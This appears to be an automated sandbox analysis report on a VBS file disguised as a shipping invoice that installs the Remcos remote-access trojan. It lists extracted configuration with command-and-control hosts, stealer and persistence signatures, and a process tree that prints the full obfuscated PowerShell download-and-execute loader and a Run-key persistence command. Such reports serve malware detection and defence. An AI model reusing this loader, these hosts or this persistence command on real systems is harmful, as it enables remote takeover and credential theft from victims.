Overview

overview

10

Static

static

1

Tracking_I...72.vbs

windows7-x64

10

Tracking_I...72.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/08/2024, 07:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Tracking_Invoice_Awb_BL_00340434757340073972.vbs

  • Size

    139KB

  • MD5

    94afb2d35a2fcfc7473b57ff851451df

  • SHA1

    e9287d3640a1c870a14f69e4dbc6bcb9e4a3b027

  • SHA256

    94a386916bc0a33eebe0a466dbfcba90ccb88891e05b0a06d0f91a84432767d1

  • SHA512

    f9d6e8367df303d7ef02b695574cb68c1123349b517724b0f59f59c3410a204dbfd6c0123e1ba963bd80a879de0c109c41d15725de0a912f5d80867c229b56f9

  • SSDEEP

    3072:BjGO63YDSdYB51Gy/ABuIWHwxoH0sHXaHb0bIkNTEx29OjmB8ZJuZ:RGO63WSdYB51Gy/quNHwaHdHqHb0bIkx

Score
10/10
remcoswealthyblessedcollectioncredential_accessdiscoverypersistenceratstealer

Malware Config

Extracted

Family

remcos

Botnet

WEALTHYBLESSED

C2

janbours92harbu03.duckdns.org:3980

janbours92harbu04.duckdns.org:3981
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-03JSUC

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Tracking_Invoice_Awb_BL_00340434757340073972.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Fosser='SUBsTR';$Fdestederne++;}$Fosser+='ing';Function Identitetsudviklingerne($Brombrbusk){$Nuraghe=$Brombrbusk.Length-$Fdestederne;For( $Complementary=2;$Complementary -lt $Nuraghe;$Complementary+=3){$Renlivedes+=$Brombrbusk.$Fosser.'Invoke'( $Complementary, $Fdestederne);}$Renlivedes;}function Spyhole($Bebyrdelser){ . ($Modvirkede) ($Bebyrdelser);}$Apprenticement=Identitetsudviklingerne '.dMIno zSki nlCalCha O/Si5 ,.C.0Sc Ka(O.W.niNenW,d voDewInsFr ,N,eTAk S1 e0F..Do0S,; a b.W,iiPonTe6ca4 ;,i DexUn6,p4Ec;Bo MirFovSe: S1Sv2.t1,r.Ls0Su)Or ,G CeL.cBakK,oT./Ce2Fr0Ve1 U0,u0Ma1Re0ov1B, ,FFoiHarnieVef.loG xke/Ge1An2Ud1 .Ti0 . ';$Sovemediciner=Identitetsudviklingerne 'KoUGrsO.eHjr,a-P,A ,gMee n.pt.u ';$Abildgaardes=Identitetsudviklingerne ' .hLat .tT.pUn: ./ S/Ru1Re0Ma3 ..Fu7,a7 V. a2 4 S6Po. V1S,5.a/AgR e,rfWarOpeT.s.rhVomDae mn .tSts ,. .p Cr emTe>Ekh GtG,ttepBisI.:la/ ,/Ors ,e .r Gv CrPu-PsjS k tPr. ec.ooAcm K/ HRMseMuf MrUnehrsMeh pmRee.in StCas ...lp ur,imAn ';$Repressionens=Identitetsudviklingerne 'Sh>ko ';$Modvirkede=Identitetsudviklingerne 'S.i re cxSa ';$Serviceorganisation='Vaulter';$philip = Identitetsudviklingerne 'TeegacquhP obi De%BaaGrpSkp GdS aOvtSta S% F\ .cP.oTepT,a,rrM.eCunc,tFl.DeG.eu AeA Cl& e&.l .teEncReh ,oAk rtDo ';Spyhole (Identitetsudviklingerne ' .$ FgOzlCyoF b ,aPrl A:K k Kr SoSuoPhnFoiLt=Al(NocHumNodMe Ma/PacPy Ud$Rop.rhC,iAmlG.i Vp C)V. ');Spyhole (Identitetsudviklingerne 'B.$ kg l ,oTubO.aSul r:FeBT.aMac At ,e .rfoiSaoerp .hOpa dgC.e =I,$ .A Kb,eiSplMedStg Sa .a .rBadskeUnsE.. asEbp,al RiFetBl(G.$UpRCheTrpAbrSoeU s.rs ,i Soann oeA,nPss,o)B. ');Spyhole (Identitetsudviklingerne 'St[ SNUneS.tHu.P SSue ArChvChi IcB eB PF,oCuiB nOrt OM ba BnElaFag eShr ,]Ch:La: oSEfeLacC u Br FiSttDoy RP,arVaoCatSmonec noSalBa Ch=A Pu[.tN,ae.dtYp.SaS .eFocZouTur IiCat SyOsPAlr.yo tBioSucAfoStlKlTUnyDrp SeUn]Ca:Ne:s,TScl,as ,1 2C ');$Abildgaardes=$Bacteriophage[0];$Complementarynterrace= (Identitetsudviklingerne 'Ho$K,g ,lSko bCraasl a:R,R ,a cdgii ,kAuaBol ,iS,t Te,rtDe=AfNV e rw B-VaOBub Hjd,eRecFot D DSbey esInt.aeI.mfe.PaNKaePatSo.UdWPlecob uC.ulUniN e OnDat');$Complementarynterrace+=$krooni[1];Spyhole ($Complementarynterrace);Spyhole (Identitetsudviklingerne 'Sl$ ,R Da udEmiAck Pa .l,eiAntcaeSpt ,.,rHSleE,a dMeePar Hs B[ $AfSQuoRev Be mm CeSpd ,iRacKaiS,n.ee ArDe].u=An$R APupGepKnrImeNenC,tO i ,c SeUnmSve.nn dtHi ');$Blnd115=Identitetsudviklingerne 'Fo$DrRAcaRadRiiA kS,akll,aiP.tBueVitel.UnDS oA wSan,rlProIga Nd nF DiTulTaeSe( P$StABdbMnihyl KdHeg,oa ia rrK.dGre,bsUn,E.$PrTBoaMas t i.eeForI,)Ge ';$Tastier=$krooni[0];Spyhole (Identitetsudviklingerne 'U,$ ,gIml ooTib uaRel.o:ReA,nm To Zwh,tIn= M(DeTR,e sC,t.i-dePS.at.tkahAo St$TrT NaScsElt Gi PeParSa)Cu ');while (!$Amowt) {Spyhole (Identitetsudviklingerne 'Ir$ ,g MlSto Fbpoa,olDr: TF .e DduntDoeSnrRiiDie,hrU.sCa= $ etUnrPeuIneLj ') ;Spyhole $Blnd115;Spyhole (Identitetsudviklingerne 'VaS DtSpaV rHat.e-BlSinlF e ,ePopSa Kv4St ');Spyhole (Identitetsudviklingerne ' ,$ GgWalmioGlb NaEllWh:,jA mtuoBlwHet A=B.(E.TS.e us Ct.e-ChPt aPatNdhEj Po$KrTSeaFlsM,t .i,oeA.rK.)Ex ') ;Spyhole (Identitetsudviklingerne 'La$Hygjal SoTob Tap.lno:PrsDeh,oiD,fBotSelL.eStsDis,n= d$IngOvlMuo Db saFrlUd:V CDeyGutSuoRudAre ynRedT r.eih.t oeFo5 ,7T + +s,%g.$ HB.naSkcSkt.ueFrr ,i .o .pBuhN,a Rg.ve.r.KocOpo luU,nK tB ') ;$Abildgaardes=$Bacteriophage[$shiftless];}$Sygeeksamenens=347050;$paraphemia=25698;Spyhole (Identitetsudviklingerne ' F$ igDel yoLybSya DlRa: aJTooOduDir Tn Da LlNoe,en,rs,r1Pa7 ,9Hu A =Se AfG eOrtTo-NeC,uoAsn itPoeMen.otR, Br$DeTGoaTysPatPoi.aeM.rGe ');Spyhole (Identitetsudviklingerne ' U$PagStlSpoBrbM.aMalS,:LsP,eoAmlChyB.gBeoNonCe2 C5 U Fi=f. Gr[SpSBlyGrsIntr.eAfmGv.R C.voUnn PvDieGnrExtO,]St:Vo: bF hr.ro EmPoBRaaOvsKleb,6L.4 oS.nttarTrib,nT,gAf(De$P.J,ooTruPrrBenoraPol.ce,nn KsFo1Aa7 ,9ye)N, ');Spyhole (Identitetsudviklingerne ' .$ShgM,lGto ob.ea.ol W:BaHAbezea rrH k GeB,n,niV nregAf Pr=Le o[N.SKay,rsUntS eu m h. TRueL x,utKo.SyEG,nBrcAfo.hd ,iNonUngA,] p:Sk: AAViSNiC.dIQ,IH..TiGCheOpt IS ttn rOvi nF,g y(Wa$ ,PR.o.olA y,eg .oD.n 2Ad5,r)kn ');Spyhole (Identitetsudviklingerne 'T $Pag.ol GoSibD.a TlAl: aU BnDei v ReUnrOvsGriP t va RrJii TaSenUni BsSumUn= T$BrHBoe ea rVokPaeKan i AnD,gLo.b sSluU bMostrt Ar Si.anBagPu(St$EpSOmyQug.eeTleTrkBosTraIlm AeS,nL eK nAfs.r,Tr$cop MaUnr,ta ,pbohsueS mM,i aa e)M ');Spyhole $Universitarianism;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\coparent.Gue && echo t"
        3⤵
          PID:1780
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Fosser='SUBsTR';$Fdestederne++;}$Fosser+='ing';Function Identitetsudviklingerne($Brombrbusk){$Nuraghe=$Brombrbusk.Length-$Fdestederne;For( $Complementary=2;$Complementary -lt $Nuraghe;$Complementary+=3){$Renlivedes+=$Brombrbusk.$Fosser.'Invoke'( $Complementary, $Fdestederne);}$Renlivedes;}function Spyhole($Bebyrdelser){ . ($Modvirkede) ($Bebyrdelser);}$Apprenticement=Identitetsudviklingerne '.dMIno zSki nlCalCha O/Si5 ,.C.0Sc Ka(O.W.niNenW,d voDewInsFr ,N,eTAk S1 e0F..Do0S,; a b.W,iiPonTe6ca4 ;,i DexUn6,p4Ec;Bo MirFovSe: S1Sv2.t1,r.Ls0Su)Or ,G CeL.cBakK,oT./Ce2Fr0Ve1 U0,u0Ma1Re0ov1B, ,FFoiHarnieVef.loG xke/Ge1An2Ud1 .Ti0 . ';$Sovemediciner=Identitetsudviklingerne 'KoUGrsO.eHjr,a-P,A ,gMee n.pt.u ';$Abildgaardes=Identitetsudviklingerne ' .hLat .tT.pUn: ./ S/Ru1Re0Ma3 ..Fu7,a7 V. a2 4 S6Po. V1S,5.a/AgR e,rfWarOpeT.s.rhVomDae mn .tSts ,. .p Cr emTe>Ekh GtG,ttepBisI.:la/ ,/Ors ,e .r Gv CrPu-PsjS k tPr. ec.ooAcm K/ HRMseMuf MrUnehrsMeh pmRee.in StCas ...lp ur,imAn ';$Repressionens=Identitetsudviklingerne 'Sh>ko ';$Modvirkede=Identitetsudviklingerne 'S.i re cxSa ';$Serviceorganisation='Vaulter';$philip = Identitetsudviklingerne 'TeegacquhP obi De%BaaGrpSkp GdS aOvtSta S% F\ .cP.oTepT,a,rrM.eCunc,tFl.DeG.eu AeA Cl& e&.l .teEncReh ,oAk rtDo ';Spyhole (Identitetsudviklingerne ' .$ FgOzlCyoF b ,aPrl A:K k Kr SoSuoPhnFoiLt=Al(NocHumNodMe Ma/PacPy Ud$Rop.rhC,iAmlG.i Vp C)V. ');Spyhole (Identitetsudviklingerne 'B.$ kg l ,oTubO.aSul r:FeBT.aMac At ,e .rfoiSaoerp .hOpa dgC.e =I,$ .A Kb,eiSplMedStg Sa .a .rBadskeUnsE.. asEbp,al RiFetBl(G.$UpRCheTrpAbrSoeU s.rs ,i Soann oeA,nPss,o)B. ');Spyhole (Identitetsudviklingerne 'St[ SNUneS.tHu.P SSue ArChvChi IcB eB PF,oCuiB nOrt OM ba BnElaFag eShr ,]Ch:La: oSEfeLacC u Br FiSttDoy RP,arVaoCatSmonec noSalBa Ch=A Pu[.tN,ae.dtYp.SaS .eFocZouTur IiCat SyOsPAlr.yo tBioSucAfoStlKlTUnyDrp SeUn]Ca:Ne:s,TScl,as ,1 2C ');$Abildgaardes=$Bacteriophage[0];$Complementarynterrace= (Identitetsudviklingerne 'Ho$K,g ,lSko bCraasl a:R,R ,a cdgii ,kAuaBol ,iS,t Te,rtDe=AfNV e rw B-VaOBub Hjd,eRecFot D DSbey esInt.aeI.mfe.PaNKaePatSo.UdWPlecob uC.ulUniN e OnDat');$Complementarynterrace+=$krooni[1];Spyhole ($Complementarynterrace);Spyhole (Identitetsudviklingerne 'Sl$ ,R Da udEmiAck Pa .l,eiAntcaeSpt ,.,rHSleE,a dMeePar Hs B[ $AfSQuoRev Be mm CeSpd ,iRacKaiS,n.ee ArDe].u=An$R APupGepKnrImeNenC,tO i ,c SeUnmSve.nn dtHi ');$Blnd115=Identitetsudviklingerne 'Fo$DrRAcaRadRiiA kS,akll,aiP.tBueVitel.UnDS oA wSan,rlProIga Nd nF DiTulTaeSe( P$StABdbMnihyl KdHeg,oa ia rrK.dGre,bsUn,E.$PrTBoaMas t i.eeForI,)Ge ';$Tastier=$krooni[0];Spyhole (Identitetsudviklingerne 'U,$ ,gIml ooTib uaRel.o:ReA,nm To Zwh,tIn= M(DeTR,e sC,t.i-dePS.at.tkahAo St$TrT NaScsElt Gi PeParSa)Cu ');while (!$Amowt) {Spyhole (Identitetsudviklingerne 'Ir$ ,g MlSto Fbpoa,olDr: TF .e DduntDoeSnrRiiDie,hrU.sCa= $ etUnrPeuIneLj ') ;Spyhole $Blnd115;Spyhole (Identitetsudviklingerne 'VaS DtSpaV rHat.e-BlSinlF e ,ePopSa Kv4St ');Spyhole (Identitetsudviklingerne ' ,$ GgWalmioGlb NaEllWh:,jA mtuoBlwHet A=B.(E.TS.e us Ct.e-ChPt aPatNdhEj Po$KrTSeaFlsM,t .i,oeA.rK.)Ex ') ;Spyhole (Identitetsudviklingerne 'La$Hygjal SoTob Tap.lno:PrsDeh,oiD,fBotSelL.eStsDis,n= d$IngOvlMuo Db saFrlUd:V CDeyGutSuoRudAre ynRedT r.eih.t oeFo5 ,7T + +s,%g.$ HB.naSkcSkt.ueFrr ,i .o .pBuhN,a Rg.ve.r.KocOpo luU,nK tB ') ;$Abildgaardes=$Bacteriophage[$shiftless];}$Sygeeksamenens=347050;$paraphemia=25698;Spyhole (Identitetsudviklingerne ' F$ igDel yoLybSya DlRa: aJTooOduDir Tn Da LlNoe,en,rs,r1Pa7 ,9Hu A =Se AfG eOrtTo-NeC,uoAsn itPoeMen.otR, Br$DeTGoaTysPatPoi.aeM.rGe ');Spyhole (Identitetsudviklingerne ' U$PagStlSpoBrbM.aMalS,:LsP,eoAmlChyB.gBeoNonCe2 C5 U Fi=f. Gr[SpSBlyGrsIntr.eAfmGv.R C.voUnn PvDieGnrExtO,]St:Vo: bF hr.ro EmPoBRaaOvsKleb,6L.4 oS.nttarTrib,nT,gAf(De$P.J,ooTruPrrBenoraPol.ce,nn KsFo1Aa7 ,9ye)N, ');Spyhole (Identitetsudviklingerne ' .$ShgM,lGto ob.ea.ol W:BaHAbezea rrH k GeB,n,niV nregAf Pr=Le o[N.SKay,rsUntS eu m h. TRueL x,utKo.SyEG,nBrcAfo.hd ,iNonUngA,] p:Sk: AAViSNiC.dIQ,IH..TiGCheOpt IS ttn rOvi nF,g y(Wa$ ,PR.o.olA y,eg .oD.n 2Ad5,r)kn ');Spyhole (Identitetsudviklingerne 'T $Pag.ol GoSibD.a TlAl: aU BnDei v ReUnrOvsGriP t va RrJii TaSenUni BsSumUn= T$BrHBoe ea rVokPaeKan i AnD,gLo.b sSluU bMostrt Ar Si.anBagPu(St$EpSOmyQug.eeTleTrkBosTraIlm AeS,nL eK nAfs.r,Tr$cop MaUnr,ta ,pbohsueS mM,i aa e)M ');Spyhole $Universitarianism;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2840
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\coparent.Gue && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3168
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4892
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "pericline" /t REG_EXPAND_SZ /d "%Dukkestuens% -w 1 $Vibefedt=(Get-ItemProperty -Path 'HKCU:\Phaetons29\').Drawbench;%Dukkestuens% ($Vibefedt)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4312
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "pericline" /t REG_EXPAND_SZ /d "%Dukkestuens% -w 1 $Vibefedt=(Get-ItemProperty -Path 'HKCU:\Phaetons29\').Drawbench;%Dukkestuens% ($Vibefedt)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:3808
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rxvbebkwfofyxr"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:532
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\brauwuvptwxdixrzj"
              5⤵
              • Accesses Microsoft Outlook accounts
              • System Location Discovery: System Language Discovery
              PID:4384
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\etgmxmgrpepikdnlszuu"
              5⤵
                PID:4748
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\etgmxmgrpepikdnlszuu"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4640
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pelstlkcdwajfoshifx.vbs"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4272

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f4ci2frd.iag.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\pelstlkcdwajfoshifx.vbs
        Filesize

        346B

        MD5

        66442ccd48f759b031f9b823384e55bc

        SHA1

        b23d081bdc9686e199bcd24aeccd77ccf4550dc6

        SHA256

        8705236d12f3890c431eef683356787b711351e8b302a2cc1fd333ecd8198355

        SHA512

        5fdb17e0e5f520bcaaab6a160655d608f8e5cefe49c6aa221b808d256294ae565e05f3f097c875ed716e8424c4c180418d7216014846d54a44948961169df245

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\rxvbebkwfofyxr
        Filesize

        4KB

        MD5

        1891919175c888ce82e9bd8a047b01ad

        SHA1

        502a6892a5d27ecb791ac5aa6d8586944f540453

        SHA256

        a6c43b4e4b8681cf0ef56c49c730fa77e34dc82db0260253a3ba75039030b9ec

        SHA512

        8bb940050b1abf6c27db133ed446f41e108f670f361ed5102408832ce33d9b87cd0880723441f1632292eeeb0a319c4e0fac0ea659eb55ebe1130cc3e6c776a3

        Download Submit

      • C:\Users\Admin\AppData\Roaming\coparent.Gue
        Filesize

        485KB

        MD5

        7758ad90fd9716d4927be506ea5f4681

        SHA1

        b44de990c314093868f0d2b7d705d999ab49ebbe

        SHA256

        3a4fe8b8c4ed2b23264d31acc0a182226506a05ff984b1b70602af49c236c5e1

        SHA512

        558f058622d2d5959fa76818085eaa653545b890732cb347d7f9c7824280066b190fbdc9d8895567ea0a7846a0f4b8f168cc06400c7411d99e7574612210e071

        Download Submit

      • memory/532-66-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/532-62-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/532-69-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/1192-18-0x00007FFFE82A3000-0x00007FFFE82A5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1192-16-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1192-15-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1192-10-0x0000027DEFF90000-0x0000027DEFFB2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1192-4-0x00007FFFE82A3000-0x00007FFFE82A5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1192-35-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1192-60-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1192-44-0x00007FFFE82A0000-0x00007FFFE8D61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2840-24-0x0000000005870000-0x00000000058D6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2840-21-0x00000000051D0000-0x00000000057F8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2840-40-0x0000000007240000-0x00000000072D6000-memory.dmp

        Filesize

        600KB

        Download

      • memory/2840-41-0x0000000007140000-0x0000000007162000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2840-42-0x0000000007F40000-0x00000000084E4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2840-38-0x00000000078C0000-0x0000000007F3A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2840-37-0x0000000005F60000-0x0000000005FAC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2840-45-0x00000000084F0000-0x000000000C5F5000-memory.dmp

        Filesize

        65.0MB

        Download

      • memory/2840-20-0x00000000025E0000-0x0000000002616000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2840-36-0x0000000005F20000-0x0000000005F3E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2840-39-0x00000000064B0000-0x00000000064CA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2840-22-0x0000000005050000-0x0000000005072000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2840-23-0x0000000005100000-0x0000000005166000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2840-34-0x0000000005920000-0x0000000005C74000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4384-70-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/4384-65-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/4384-63-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/4640-64-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/4640-67-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/4640-68-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/4892-76-0x0000000021F90000-0x0000000021FA9000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4892-80-0x0000000021F90000-0x0000000021FA9000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4892-79-0x0000000021F90000-0x0000000021FA9000-memory.dmp

        Filesize

        100KB

        Download

      • memory/4892-81-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/4892-84-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/4892-85-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/4892-53-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/4892-90-0x0000000000C00000-0x0000000001E54000-memory.dmp

        Filesize

        18.3MB

        Download